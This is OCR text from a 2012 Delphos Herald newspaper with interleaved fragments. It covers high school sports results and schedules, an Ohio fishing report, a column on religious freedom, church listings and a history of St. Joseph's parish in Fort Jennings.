Volleyball: Crestview at Coldwater, 5:30 p.m.; St. John's at Spencerville, 6 p.m.; Jefferson at Perry, 6 p.m.; Lincolnview at Ottoville, 6 p.m.; Hardin Northern at Elida, 6 p.m.; Kalida at Van Wert, 6 p.m.; Columbus Grove at Leipsic (PCL), 6 p.m.
Co-ed Cross Country: St. John's, Ottoville, Lincolnview and Van Wert at Wayne Trace Invitational, 4:30 p.m.
Girls Tennis: Van Wert at Bryan, 4:30 p.m.
WEDNESDAY
Girls Soccer: Fort Jennings at Miller City (PCL), 5 p.m.; Kalida at Lima Central Catholic, 5:30 p.m.
Boys Golf: Jefferson and Lincolnview at Paulding (NWC), 4 p.m.; Bath at Ottoville, 4 p.m.; St. John's at Versailles (MAC), 4:30 p.m.; Spencerville, Crestview and Ada at Bluffton (NWC), 4:30 p.m.
hands. The Wildcats couldn't take advantage and Waynesfield took over at its 21 with 1:33 on the clock. With Miller hitting 3-of-7 passes for 50 yards and also running for 21 (13 rushes, 68 yards), they drove the field in 11 plays. At the Delphos 2, Hennon busted off left guard with 2.2 ticks showing. Metsa's kick made it 14-13 at the half. "I thought our first two series, we were pretty solid offensively. We then got a little lax," Lindeman added. "What was good was how we came back out the second half and did well in all three phases: forcing turnovers and even getting a special teams score." Jefferson hosts Paulding 7:30 p.m. Friday to commence NWC action. Waynesfield is at Fort Recovery.
Tom Morris photo
Jefferson junior Zavier Buzard would not be denied on this scoring run Friday night, a 14-yarder where he bulled past Waynesfield-Goshen’s Jacob Risner and another defender on his way to the end zone. The score was part of a 25-point second half and a 38-17 victory.
ping it, he tore off for the wall on the right side, found the seam, made one cut inside at midfield and was gone for an 80-yard return score. Junior Austin Jettinghoff’s extra point was wide for a 25-14 spread at 5:41 of the third. The Tigers needed to respond to stay within striking distance and they did. After Lake Turner returned the kickoff 16 yards to the 36, they went on a 10-play sojourn that reached the Delphos 19. From there, exchange student Roope Metsa was good on a 36-yard field goal try to reduce the deficit to 25-17 with 2:03 showing in the third. The Red and White answered after junior Tyler Mox returned the kickoff 18 yards to the 38. They needed nine plays to do so, all but one a run — a 13-yard pass from Jettinghoff (5-of-8 passing, 129 yards) to classmate Ross Thompson (2 grabs, 56 yards). At the Tiger 14, junior tailback Zavier Buzard (18 totes, 143 yards) took a sweep to the right side and bulled his way to the pylon for the six. Jettinghoff’s point-after was wide for a 31-17 edge with 9:58 left. The next host possession ended as Miller was picked off by freshman Dalton Hicks at the Delphos 49. It took five plays — including a 45-yard aerial from Jettinghoff to Kortokrax — to add the final tally. At the WG 1, Wessell bulled straight up the middle with 6:58 left. Jettinghoff was good on the kick for the final 21-point margin. After the Wildcats held on the opening possession, they rode the offensive line of Geoff Ketcham, Evan Stant, Colin McConnahea, Isaac Illig and Kimmett on a 7-play, 91-yard drive — all on the ground. Buzard ran five times for 82 yards, including the 55-yard scoring run. He started off left tackle, escaped pressure behind the line and popped outside, finding open spaces along the sideline. He outran the defenders to the pylon. Jettinghoff’s conversion made it 7-0 at 7:03 of the first. The Tigers — out of the Wing-T — replied with a 14-play, 69-yarder, all on the ground. 
At the Jefferson 1, Gabe Hennon (25 carries, 87 yards) powered in off right guard for the tally with 18.9 ticks showing in the period. Metsa tied it at 7-7. An offensive pass interference on the Wildcats' drive stymied that sequence and they punted, as did WG on its series. Jefferson used a quick 4-play, 56-yard series on its drive to retake the lead, including a 43-yard pass from Jettinghoff to Thompson. At the Tiger 3, Wessell went inside right guard, took one step to the right and found the end zone. However, the PAT was wide for a 13-7 lead with 6:28 showing in the half. The hosts reached Jefferson space but another tipped pass by Kortokrax ended up in Thompson's
JEFFERSON 38, WAYNESFIELD-GOSHEN 17
Jefferson 7 6 12 13 - 38
W-Goshen 7 7 3 0 - 17
FIRST QUARTER
DJ — Zavier Buzard 55 run (Austin Jettinghoff kick), 7:03
WG — Gabe Hennon 1 run (Roope Metsa kick), :18.9
SECOND QUARTER
DJ — Quentin Wessell 3 run (kick failed), 8:28
WG — Hennon 2 run (Metsa kick), :02.2
THIRD QUARTER
DJ — Wessell 15 run (run failed), 8:02
DJ — Drew Kortokrax 80 punt return (kick failed), 5:41
WG — Metsa 36 field goal, 2:03
FOURTH QUARTER
DJ — Buzard 14 run (kick failed), 9:58
DJ — Wessell 1 run (Jettinghoff kick), 6:58
TEAM STATS (Waynesfield-Goshen, Jefferson)
First Downs: 17, 12
Total Yards: 283, 360
Rushes-Yards: 51-205, 33-231
Passing Yards: 78, 129
Comps.-Atts.: 7-18, 5-8
Intercepted by: 0, 3
Fumbles-Lost: 1-1, 2-1
Penalties-Yards: 4-20, 6-55
Punts-Aver.: 3-40, 4-40.3
INDIVIDUAL
WAYNESFIELD-GOSHEN
RUSHING: Gabe Hennon 25-87, Garrett Miller 13-68, Gabe Wilcox 9-37, James Elliott 4-13.
PASSING: Miller 7-18-78-3-0.
RECEIVING: Eli O'Leary 3-20, Lake Turner 2-27, Jerod Hennon 2-22.
JEFFERSON
RUSHING: Zavier Buzard 18-143, Quentin Wessell 13-84, Austin Jettinghoff 2-4, Team 1-(-3).
PASSING: Jettinghoff 5-8-129-0-0.
RECEIVING: Ross Thompson 2-56, Drew Kortokrax 1-45, Tyler Mox 1-14, Buzard 1-4.
THURSDAY
Boys Soccer: Kalida at Fort Jennings (PCL; V first), 5 p.m.; Spencerville at Lincolnview, 5 p.m.; Wapakoneta at Elida (WBL), 7 p.m.
Girls Soccer: Allen East at St. John's, 5 p.m.; Shawnee at Van Wert (WBL), 5 p.m.
Boys Golf: Spencerville and Bluffton at Columbus Grove (NWC), 4 p.m.; Crestview, LCC and Allen East at Lincolnview (NWC), 4 p.m.; Fort Recovery at St. John's (MAC), 4:30 p.m.; Elida at Van Wert (WBL), 4:30 p.m.
Girls Golf: Lincolnview and Indian Lake at St. Henry (Elks), 4 p.m.
Volleyball: St. John's at Coldwater (MAC), 5:30 p.m.; Ottoville at Kalida (PCL), 6 p.m.; Spencerville at Wayne Trace, 6 p.m.; Elida at Wapakoneta (WBL), 6 p.m.; Van Wert at Shawnee (WBL), 6 p.m.
Girls Tennis: Van Wert at Elida (WBL), 4:30 p.m.
FRIDAY
Football: Paulding at Jefferson (NWC), 7:30 p.m.; Ada at Spencerville (NWC), 7:30 p.m.; Wapakoneta at Elida (WBL), 7:30 p.m.; Allen East at Columbus Grove (NWC), 7:30 p.m.; Shawnee at Van Wert (WBL), 7:30 p.m.; Crestview at Lima Central Catholic (NWC), 7:30 p.m.
Boys Soccer: Lincolnview at Ottoville, 5 p.m.
Girls Soccer: Ottoville at Lincolnview, 4:30 p.m.
SATURDAY
Football: Port Clinton at St. John's, 1 p.m.
Boys Soccer: Fort Jennings at Archbold (JV first), 5 p.m.; Kalida at Celina, 7 p.m.
Girls Soccer: Lima Senior at St. John's (V only), 10 a.m.; Wauseon at Kalida, 1 p.m.
Volleyball: Spencerville at St. Marys Invitational, 10 a.m.; Columbus Grove at Arlington, 10 a.m.; Stryker and Archbold at Crestview, 10 a.m.; Kenton at St. John's, 11 a.m.
Co-ed Cross Country: Ottoville, Lincolnview, Spencerville, Kalida and Crestview at Columbus Grove Invitational, 9 a.m.; Van Wert at Greenville, 9 a.m.; St. John's and Elida at Wapakoneta Night Meet, 7 p.m.
Bulldogs rout rival Rockets in grid opener
By Dave Boninsegna
The Delphos Herald
COLUMBUS GROVE — It was deja vu all over again for the Columbus Grove Bulldogs as they began the 2012 football season the same way as the previous three — with a win over their State Route 12 rival Pandora-Gilboa Rockets Friday night at Clymer Stadium. The Rockets scored on the first possession of the game but Grove rattled off 40 unanswered points en route to a 40-6 victory. Collin Grothaus ran for a touchdown and threw for two more, finishing with 14 carries for 193 yards. Joey Warnecke ran the ball just three times but two of those carries found the end zone. Dakota Vogt had a 51-yard touchdown run, while David
STOCKS: Quotes of local interest supplied by Edward Jones Investments, close of business August 24, 2012.
Bogart and Riley Brubaker both caught Grothaus passes for touchdowns. The Rockets used six plays on their first drive of the game in finding the end zone; Seth Schmenk took the ball 46 yards to paydirt, although the extra point was missed, making it a 6-0 contest. However, that lead would not last long; the hosts would answer back on their first touch of the ball as Schmenk's counterpart, Grothaus, took the Bulldogs' third play from scrimmage 67 yards to the end zone. After a completed 2-point conversion, the home team led 8-6. It appeared the Rockets would be on the move again; P-G was on a 10-play drive when it stalled out and turned the ball over on downs. Grove went 75 yards in six plays, culminating with a 51-yard TD run by Vogt; after
FRIDAY ROUNDUP
Scoring by Quarters:
Pandora-Gilboa 6 0 0 0 - 6
Columbus Grove 22 6 0 12 - 40
Scoring
1st Quarter
PG - Schmenk 46 run (kick failed)
CG - Grothaus 67 run (2-point conversion good)
a missed 2-point attempt, the home team led 14-6 with just under three minutes to go in the first stanza. Grothaus didn't make many mistakes on the night but on the Bulldogs' next possession, he gave up an interception as the Rockets picked off a pass at the Columbus Grove 26-yard line. However, the 'Dogs' defense was relentless and returned the favor when Hunter Giesige picked off a Schmenk pass to give the ball back to the hosts. This set up another long drive and another big play; Grothaus got loose again, this time for 50 more yards, setting up a 35-yard touchdown pass to Bogart, making it a 22-6 game. Both teams were held scoreless in the third but the home team got another big play in the fourth when Brubaker got open for a 40-yard strike to bring the score to 34-6. The Bulldogs scored the final points of the contest on yet another big play, as Warnecke found the end zone for the second time, this one from 22 yards out. Grove rushed for nearly 320 yards in the game, while Grothaus was 5-of-7 passing for 108 yards. The Rockets ran for 123 yards with 38 yards in the air. But the real difference was in the penalty yards. The first game of the season normally brings about a lot of adjustments but the Rockets were penalized five times for false starts and 10 times in the game for nearly 100 yards. Grove was flagged eight times for 45 yards. Grove hosts Allen East at 7:30 p.m. Friday.
CG - Vogt 51 run (2-point conversion failed)
CG - Bogart 35 pass from Grothaus (2-point conversion good)
2nd Quarter
CG - Warnecke 11 run (2-point conversion failed)
3rd Quarter
No scoring
4th Quarter
CG - Brubaker 40 pass from Grothaus (2-point conversion failed)
CG - Warnecke 22 run (2-point conversion failed)
Score by Quarters:
Perry 0 0 0 7 - 7
Spencerville 21 14 22 6 - 63
Scoring:
First
SV - John Smith 49 run (kick failed)
SV - Smith 39 run (Jacob Lowry kick)
SV - Hunter Patton 94 interception return (Derek Goecke pass to Dominick Corso)
Second
SV - Colton Miller 1 run (Lowry kick)
SV - Anthony Schuh 19 run (Lowry kick)
Third
SV - Smith 10 run (Lowry kick)
SV - Schuh 33 run (Lowry kick)
SV - Dusty Settlemire pass from Mason Nourse (Nourse to Logan Vandemark)
Fourth
SV - Vandemark 1 run (run failed)
P - Caiden Dicke 8 run (Andrew Gipson kick)
Stats (Perry, Spencerville):
First Downs: 5, 19
Total Yards: 72, 557
Rushing Yards: 72, 534
Passing Yardage: 0, 23
Comp./Atts./Ints.: 0-7-3, 2-2-0
Fumbles/Lost: 4-1, 1-0
Punts/Aver.: 5/36.4, 0/0
Penalties/Yards: 3-25, 5-50
Spencerville Rushing:
John Smith - 17 rushes, 238 yds., 3 TDs
Anthony Schuh - 10 rushes, 95 yds., 2 TDs
Colton Miller - 11 rushes, 95 yds., 1 TD
Bearcats destroy Commodores
SPENCERVILLE — The Spencerville football team dominated on both sides of the ball Friday night at Moeller Stadium, compiling 557 yards of offense and holding the Commodores to a mere 72 yards, securing a 63-7 rout. All but 23 of those yards came on the ground for the Bearcats, who host Ada Friday.
OHIO DEPARTMENT OF NATURAL RESOURCES
Division of Wildlife Weekly Fish Ohio Fishing Report
CENTRAL OHIO
Alum Creek Lake (Delaware County) - Smallmouth bass are active in this 3,192-acre lake north of Columbus; use crankbaits and jigs to fish the drop-offs of points in the lower basin. Saugeye can be caught in the same areas; try trolling worm harnesses in front of the beach at dawn and dusk. Crappies are being found around woody vegetation in 10-15 feet of water; use jigs or minnows. Muskies can provide good action this time of year; troll crankbaits along main lake points, the dam and causeways.
Kokosing Reservoir (Knox County) - This 149-acre reservoir provides good largemouth bass and crappie fishing. Fishing the island and along the face of the dam for largemouths can be productive; try crankbaits and spinner baits. Crappies can be found along woody shoreline cover and in the old creek channel. As water temperatures decrease, these will move into shallower water to feed; minnows and jigs are the best baits. Channel catfish can be caught from shore on worms, shrimp and chicken livers. This lake has a 10-HP limit.
NORTHWEST OHIO
Maumee River (Lucas/Wood counties) - Anglers looking for some smallmouth action should check around Grange Island near the Route 64 bridge in Waterville. Anglers have been wading and casting pink and chartreuse twister tails; good numbers of fish in the 8- to 15-inch range have been caught, as well as a few larger ones, especially in the 4- to 5-foot deep holes around the island. Anglers can access the river from Memorial Park in Waterville. This is part of the Lake Erie fishing district, so a bag limit of 5 and a minimum size of 14 inches apply.
Nettle Lake (Williams County) - This 103-acre natural glacial lake is located on CR 4.75, off of SR 49. Largemouth bass should be biting; mornings are usually the best but don't overlook the evening bite. Focus efforts along the edges; try top-water lures and creme worms.
Large crappies can usually be found near the lily pads in the northwest corner. There is a boat ramp off of CR 4.75 at the southwest corner. There are no horsepower restrictions; however, there is a No-Wake Rule (power boaters must operate at idle speed) between the hours of 6 p.m. and 10 a.m. From 10 a.m. until 6 p.m., there are no speed restrictions for power boaters. Findlay Reservoir #2 (Hancock County) - This 629-acre site with
4.2 miles of shoreline is located southwest of Findlay on Twp. Road 207, with a full boat ramp at the southern shore. Anglers should still be able to hook into some walleye in the evenings near the shoreline. Yellow perch and white bass should also be biting; white bass can be found feeding near the surface in schools throughout. During summer and fall, yellow perch can be caught around structure; the best baits include minnows and larval baits fished near the bottom. There is a 9.9-HP limit. NORTHEAST OHIO Mogadore Reservoir (Portage County) - This scenic reservoir continues to produce excellent catches of largemouths; casting white weedless rubber frogs into weedy bays and retrieving them over pockets of open water consistently produces explosive strikes. Weedless soft plastic worms in dark colors and brightly-colored deepdiving crankbaits have also been effective. The site is owned/operated by the City of Akron; thanks to the city, sportsmen/women can enjoy its wildlife-related resources. Fishing from shore is somewhat limited but the entire reservoir is available for boat fishing (electric motors only). SOUTHWEST OHIO Grand Lake St. Marys (Auglaize/ Mercer counties) - Channel catfish are popular at Ohio’s largest inland lake; try fishing on the bottom with nightcrawlers, chicken livers, shrimp or cut baits, particularly the Windy Point fishing pier and the stone piers along the east bank. Increase your chances of catching a large flathead catfish by using large chub minnows or live sunfish. LAKE ERIE Daily Bag Limit Per Angler Regulations to Remember: Walleye (on Ohio waters of Lake Erie) - 6 fish (minimum size, 15 inches); Yellow perch (on all Ohio waters of Lake Erie) - 30 fish; Trout/salmon - 5 through Friday (minimum size, 12”); Black bass (largemouth and smallmouth) - 5 (minimum size, 14”). Western Basin: Walleye fishing has been fair, especially N of “B” and “C” cans of the Camp Perry firing range and W of Rattlesnake Island. 
Trollers have been using worm harnesses with inline weights or divers and also divers with spoons. ... Yellow perch fishing has been good, particularly near buoy 13 of the Toledo shipping channel, the turnaround buoy of the Toledo shipping channel, the Toledo water intake, around “A” and “B” cans of the Camp Perry firing range, W of Rattlesnake Island and between Lakeside and Kelleys Island; perch-spreaders with shiners fished near the bottom produce the most fish.

Department insiders that no one was held accountable. Coptic Christians and other religious recent release of the 2011 International Religious Freedom Report. “Egyptians are building a brand new democracy,” said Clinton, describing her recent visit there. “As I told the Christians with whom I met, the United States does not take the side of one political party over another. What we do is stand firmly on the side of principles. Yes, we do support democracy
Clinton defends religious liberty - abroad
TERRY MATTINGLY
Saturday, August 25, 2012
The Herald – 7
On Religion
-- real democracy, where every citizen has the right to live, work and worship how they choose. ... “We are prepared to work with the leaders that the Egyptian people choose. But our engagement with those leaders will be based on their commitment to universal human rights and universal democratic principles.” The “sobering” reality, she stressed, is that religious freedom is “sliding backwards” worldwide, with more than a billion people living under regimes that deny them freedom of speech, association and liberty on matters of conscience, noted Thomas Farr, director of Georgetown University’s Project on Religious Freedom. He served as the first director of the State Department office on international religious freedom. The problem is that America’s ambassador at large for international religious freedom has “little authority, few resources and a bureaucracy that is -- notwithstanding the secretary’s fine words -- largely indifferent” to the global state of religious freedom, noted Farr, in remarks posted at National Review Online. “It doesn’t take a rocket scientist to realize that this issue is not a priority for this administration, except perhaps for the speechwriters (who are doing an outstanding job).” In her speech, Clinton did address a few hot topics that have previously been out of bounds, such as blasphemy laws. It’s time for Americans to realize, she said, that matters of faith and conscience are often life-and-death concerns -- literally. “Certain religions are banned completely, and a believer can be sentenced to death,” she said. When Americans defend religious freedom they are not simply defending values found in this land’s laws and creeds. They are also defending a central tenet of the Universal Declaration of Human Rights.
Thus, Clinton quoted the declaration itself. It is impossible to read those words, she said, without realizing that “religious freedom is not just about religion.” It’s about unbelievers, heretics, apostates and converts being able to live, think and gather in safety without the “state looking over their shoulder.” Without freedom of conscience, said Clinton, democracy is not safe. “You can’t debate someone who believes that anyone incorrect views.”
Sunday - 9:00 a.m. Worship Service. Monday - 5:00 p.m. Hall in use. Wednesday - 7:00 p.m. Worship Service. Saturday - 8:00 a.m. Prayer Breakfast; 3:30 p.m. Wedding. Sunday - 9:00 a.m. Worship Service; 9:15 a.m. Seekers Sunday School class meets in parlor; 10:30 a.m. Worship Service; 11:30 a.m. Radio Worship on WDOH; 1:00-3:00 p.m. Sr. High Kick-off @ Mike & Beckey Binkley; 5:30 p.m. Food for Concert in the Park served by Trinity’s Mission Committee; 6:00 p.m. Concert in the Park “Dan Heath with the Paradise Band.” Mon.: 7:00 p.m. Trustees; 7:30 p.m. Administrative Council.
BREAKTHROUGH 101 N. Adams St., Middle Point. Pastor Scott & Karen Fleming. Sunday - Church Service - 10 a.m., 6 p.m. Wednesday - 7:00 p.m.
112 E. Third St.
Lucy Pohlman 419-339-9196; Schmit, Massa, Lloyd 419-692-0951; Rhoades Ins. 419-238-2341.
Van Wert County
until 11:30 a.m. - Wednesday Line - (419) 238-4427 or (419) 232-4379. Emergency - (419) 993-5855.
Sunday - 8:45 a.m. Friends and Family; 9:00 a.m. Sunday School LIVE; 10:00 a.m.
Stop in & See Us After Church For
Sunday Rolls!
662 Elida Ave., Delphos 419-692-0007 Open 5 a.m.-9 p.m.
419-692-3413
SALEM UNITED
Sunday School; 9:30 a.m. - Worship; 10:45 a.m. - 11:00 Church Service; 6:00 p.m. - Evening Service. Wednesday - 7:00 p.m. Evening Service. Monday - 6 p.m. Senior Choir; 6:30 p.m. - Capital Funds Committee.
Pastor: Rev. Ron Prewitt. Sunday - 9:15 a.m. Morning worship with Pulpit Supply.
Putnam County
IMMACULATE CONCEPTION CATHOLIC CHURCH, Ottoville. Rev. John Stites. Mass schedule: Saturday - 4 p.m.; Sunday - 10:30 a.m.
ST. BARBARA CHURCH, 160 Main St., Cloverdale 45827. 419-488-2391. Fr. John Stites.
KINGSLEY UNITED METHODIST, 15482 Mendon Rd., Van Wert. Phone: 419-965-2771. Pastor Chuck Glover. Sunday School - 9:30 a.m.; Worship - 10:25 a.m.
10098 Lincoln Hwy. Van Wert, OH
419-238-9567
Alexander & Bebout Inc.
Boarding Kennel and Grooming
The Animal House
Foster Parents Needed!
Phone 419-302-2982 animalhousekennels.com 20287 Jennings Delphos Rd. Delphos, Ohio 45833. CORNERSTONE BAPTIST CHURCH 2701 Dutch Hollow Rd. Elida Phone: 339-3339 Rev. Frank Hartman Sunday - 10 a.m. Sunday School (all ages); 11 a.m. Morning Service;
419.238.1695 or
GOOD FOOD COOL TREATS
• Burgers • Fries • Shakes • Ice Cream
The Main Street
107 E. Main Street • Van Wert, OH 419-238-2722
Ice Cream Parlor
Fort Jennings churches
(Continued from page 4)
received from Schoolmaster Boehmer, Herzog’s landlord in Fort Jennings. Boehmer warned of trouble brewing in Fort Jennings because of Rev. Herzog’s zealous but imprudent teachings. Records showed that Herzog paid personal property taxes in 1847 and 1848. These taxes were paid only by residents in the township. Rev. Herzog left Fort Jennings, returning to Minster, where he died in 1853. In August of 1848, Father Bohne was appointed the new resident pastor of Fort Jennings. This meant a Catholic parish was established at that time. With Father Bohne’s pastorate the records of the parish began. The first baptism recorded was that of Pauline Alvina, daughter of Louis and Catherine (nee Bolker) de Lucenay, baptized 20 October 1848. The next entry was twins, Wilhelm and Catherine, son and daughter of Ferd and Agnes Lehmkuhl, baptized 25 October 1848. The only other baptism that year was Anna Elizabeth Helmkamp, daughter of William and Anna. The Bishop had encouraged the building of a new church. This was accomplished in 1852, under the guidance of Father Bohne. It was built on Water Street on lots donated by Boehmer. The 40 X 60 brick structure had a wooden steeple. The altar, pulpit and pews were of native black walnut. It had a small choir loft and the edifice was heated with a wood-burning furnace. Entries of the first deaths were evidently made in the year of the cholera plague, 1855. These included: Schulte, kind, Aug 16; Henrick Brinkman, frau, Aug 19; L. de Lucenay, Aug 29; H. Broecker, frau, Aug 26; G. Stratman, Aug 29; F. Schimmoller, Sept 6; Lursman, kind, Sept 8; Frederick Kramer, Sept 17; L. Kramer, Sept 21; Casper Lehmkuhl, frau, Oct 8; Stratman, kind, Oct 12 and Franz Werries, Dec 14. Burials were made the same day as the death. Added to the cause of death were typhus, magenfieber and fleckenfieber.
In the two years, 1855 and 1856, there were 62 deaths in the parish, 28 of which were those of children. The peak of the plague was over when the little parish suffered another loss. Father Bohne, who had suffered from epilepsy, was taken ill in June of 1860 and died in September. He was buried in the new graveyard down along the river, rather than in the old one in the same block as the church. After Father Bohne’s death the parish was attended to by Rev. Francis Westerholt of Delphos St. John’s. He served until 1861, when Father Goebbels was named the second resident pastor from 1861 to 1864. Then Ottoville became a mission of Fort Jennings. Father Bohne had lived in homes of parishioners. However, Father Goebbels had a two-story frame rectory built on Water Street. Soon turmoil rocked the nation. The Civil War began and several sons of the parish were called to service. There is no complete list of these men but the Blue Book lists the following Civil War veterans as being buried in the St. Joseph’s Cemetery: Fredrich Baumann, Amos Boehmer, Henry Bode, Mathias Boberg, Ferdinand Eggemann, Theodore Hageman, Bernard Lehmkule, Joseph Menke, Frederich Schuerman, Henry Schuerman and John Wiechart. Sigmund Rekart and John Discher, Jr. also served. The first marriage records of the parish date from Father Goebbels’ time. On 11 February 1863, he officiated at the marriage of Anton von Lehmden and Catherine Ostendorf. On 4 November 1863, Ignatius Neidert and Catherine Reckfelder were joined in marriage. The first record of a First Communion class was made by Father Goebbels. In this March 1862 class of 16 were: Wilhelm Boehmer, Ludwig Calvelage, Mathias Shluter, Bernard Bohn, Maria Elizabeth Focker, Elizabeth Catherine Odenwaller, Anna Marie Recker, Mary Catherine VonDerEmbse, Julia Rekart, Lucia Schlober, Maria Agnes Wischenbrink, Catherine Hellman, Maria Wink and Maria Elizabeth Gerker. When Father Goebbels was reassigned, the Rev. H. E. Hammers became the pastor.
He remained for less than a year in 1866. Then the parish became a mission of Ottoville again, where Rev. Anthony Abels was pastor. In 1866 the Rev. Christian Viere was sent as the new pastor of Fort Jennings. He remained as pastor for two years. Ten years after Father Viere left Fort Jennings, Bishop Gilmore removed him from his pastorate at Defiance St. John’s. Viere left the ministry, became a doctor of medicine and returned to Fort Jennings to practice. Residents elected him mayor of the village and justice of the peace of Jennings Township. Viere was reconciled with the Catholic Church before his death on 21 January 1893. He was buried as a priest in St. Joseph’s Cemetery. Following Father Viere’s reassignment, the parish again became a mission of Ottoville. The Rev. Michael Mueller met the spiritual needs of the parish for 2 years until a new pastor, the Rev. Leonz Zumbuhl, arrived in July of 1870. During several months of 1872, while still assigned to Fort Jennings, Rev. Zumbuhl taught at St. Mary’s Seminary in Cleveland. During that time Rev. Mueller again came to Fort Jennings from Ottoville. St. Joseph’s remained a mission of Ottoville for 2 years until Rev. Charles Barbier arrived. The new pastor had been a French artillery officer. He owned a large library on the subject of fireworks. Each year he arranged for a colorful fireworks display on the church grounds on the Fourth of July. Father Barbier made the fireworks himself. Father Barbier died on 23 August 1876, and was buried in the parish cemetery. Father Barbier instructed that the chemicals he possessed for making fireworks should be thrown into the river when he died. He was afraid that they might become dangerous weapons in the hands of inexperienced handlers. A few months after the death of Father Barbier, the Rev. John Michenfelder was appointed to the parish. He and the Ottoville pastor also cared for the new Kalida Mission, which was founded in 1877.
The main altar of the church was replaced during Father Michenfelder’s pastorate and the parish bought an organ. Father Michenfelder remained three years before being transferred. His successor, the Rev. George Peter, also moved on after only three years. Father Jacob Heidecker arrived in Fort Jennings in July of 1881. He soon convinced parishioners of the need for a new church. Work began soon after Frederick Heitz, of Delphos, was hired as the general contractor. A procession of parishioners hauled stone by horse and wagon from the Rimer quarry. Bricks were made from a clay deposit along the Auglaize River. Bricks were burned on the spot under the supervision of William Guthrie, who received $5.00 a day. The cornerstone was laid 27 May 1883. Soon another slender Gothic spire stood out as a landmark in Putnam County. The church was 132 X 55 feet and erected at a cost of $21,000.00. The dedication took place 4 May 1884 but a torrential rain dampened the planned procession. One of the most unique architectural features of this edifice was the flying buttresses, which graced each corner of the steeple and gave it added support. The furnishings of the church were ash and the gift of Matthias Hellmann, who had willed an 80-acre farm to the parish. Sale of the farm raised $4,500.00, which was used to purchase the pews, altar, pulpit and Communion rail. The ornate workmanship of the main altar and the 2 side altars was considered to be among the most beautiful in Northwestern Ohio. The old church was converted into classrooms to supplement the corner school building. Father Heidecker left Fort Jennings in 1888 for the Dakotas, where he later died. He was replaced by Swiss-born Father Charles Braschler, whose pastorate lasted one year. He was a linguist and musician. He could play a number of musical instruments in addition to the organ. Under his leadership an addition to the cemetery was laid out and a large crucifix was erected in the graveyard.
A year before the turn of the century Rev. Matthias Arnoldi was appointed to succeed Father Braschler. A new brick pastoral residence was built at the cost of $7,000.00 during Father Arnoldi’s pastorate. In 1904 lightning damaged the old church building, which was being used as a school. A new school was built by the parish on Lot 6 and dedicated in August of 1909. The Toledo Diocese was formed in 1911. This was the third diocese of which Fort Jennings was a part since its formation 63 years earlier. First it was Cincinnati, then Cleveland. Father Arnoldi was given credit for bringing the Sisters of St. Francis, Tiffin to Fort Jennings but such was not the case. They arrived during that time but not with his blessings. He did nothing to promote their comfort. An entry in the minute book in the Tiffin archives of the Sisters, dated September 1913, reads: “Sisters Anastasia, Mercedes and Vincent are sent to St. Joseph’s School, Fort Jennings, Ohio. Mrs. Leo Wildenhaus taught the upper grades. The Rev. Mathias Arnoldi, Pastor, did not wish sisters, so he made little preparations for their coming….” The Sisters lived in the school for some time, but the first night they slept in the Miehls’ home, because the mattresses provided for them were “so dirty.” Parishioners came to their aid with food and living necessities. The bishop visited the parish. Soon after, the Rev. John Christ was appointed to replace Father Arnoldi. Rev. Christ arrived in 1914. He was also an accomplished musician and an avid gardener. He displayed the best blue gladiolas at the Chicago World’s Fair. The next pastor was the Rev. Philip Schritz, who arrived in 1916. During his pastorate the C K of O held a picnic on the church grounds to buy a stained glass window for the Sanctuary. In 1916 the parish had 162 families (including 8 mixed marriages) and a congregation of 700 members. Then in 1917 the USA declared war on Germany.
Special church services were held, including a novena, to implore the aid of the Immaculate Mother of Peace. Electric lights were installed in church in time for this special service. In 1917 the Sisters of St. Francis also moved into their new brick convent. A special service was included during the Forty Hours Devotion in August of 1918. The community prayed for the safe return of the 47 men of the parish, who were serving in the military. Three months later the armistice was signed. Four young men died during the war. They were Jacob Yenner, William Hellman, Elmer Kalt and Grover Calvelage. Receptions were given at the Memorial Hall for returning soldiers. The Spanish influenza epidemic struck the community during the winter of 1918, infecting more than 100 people in a few days.
A “mission” was held in the Parish in 1919. Many folks were upset because of repeated sermons on race and suicide. “But what really riled their feathers was that many good people were refused absolution in the confessional for trivial reasons.” Some of those old “missions” were fire and brimstone. In 1921 the new sanctuary windows, which were made in Germany, were installed. That was the same year the township and village public schools were consolidated. Transportation was provided to everyone. At that time the parochial school had about 130 students. St. Joseph’s School operated as a parochial grade school until January 1931. It was in December of 1930 when the Fort Jennings Board of Education made a contract with St. Joseph Parish to use the parochial school building for a public school for grades 1 to 8. The consolidation was complete. During the roaring twenties the men of the parish held a picnic in VonLehmden’s grove. The pastor remarked, “No dance nor foolish doings were allowed.” In March of 1920, an early morning storm damaged the slate roof of the church and blew down the chimneys. Another interesting controversy arose as to whether the Ben Dickman family belonged to the Fort Jennings Parish or Kalida. Father Rupert of Delphos St. John’s came to decide the issue. He believed the family lived closer to Fort Jennings. Also, members of a neighboring parish came to Fort Jennings for Saturday confessions because they were up in arms about their pastor making requests for money in the confessional.
In 1924 Father Schritz visited all parishioners and took up a subscription for a new furnace in the school and a driveway in the cemetery. School attendance was averaging 160 students at this time. It was noticed in about 1928 that one young man and one young woman from the community were attending college. Rev. George J. May arrived in 1929 to take over the reins as pastor. He found the school building to be too small so 2 rooms were added, making 8 classrooms, with 9 teaching sisters. This was the year when B. A. Miehls bought a new organ in Lima and donated it to the parish. Mrs. B. A. Miehls had been the organist for almost 35 years. In those days the people were told which parish church to belong to. A controversy arose over the boundaries between Cloverdale, Ottoville and Fort Jennings. A representative from the diocese ruled that everything from the Muntana Road north was Cloverdale territory. The favorite pastor of all time, Father John H. Miller, arrived in Fort Jennings in the fall of 1937. He would serve the parish for the next 30 years.
He was a very saintly man, who loved to fish and got along well with the Lutherans. His housekeeper was Theresa Long, who also did the gardening. Father Miller often took Theresa and the Sisters of St. Francis along on fishing trips to the Auglaize River. Theresa was often seen picking up fish worms while gardening and putting them into her apron pocket. Then came “Pearl Harbor” on 7 December 1941, a day which would live in infamy. Many young men were called to the service of their country. Five from the parish did not return. They were Hubert Berelsman, Raymond Brockman, Elmer Broecker, Francis Hageman and William Lauf. The service flag in the church was filled with 103 stars. The parish celebrated the centennial in 1949, although it should have been one year earlier. The church was frescoed, a new rubber tile floor was laid and pews were revarnished in preparation for the celebration. The high school band led the procession for this event. The book “First One Hundred Years of St. Joseph’s Parish” was written at this time.
First brick Catholic church in Fort Jennings.
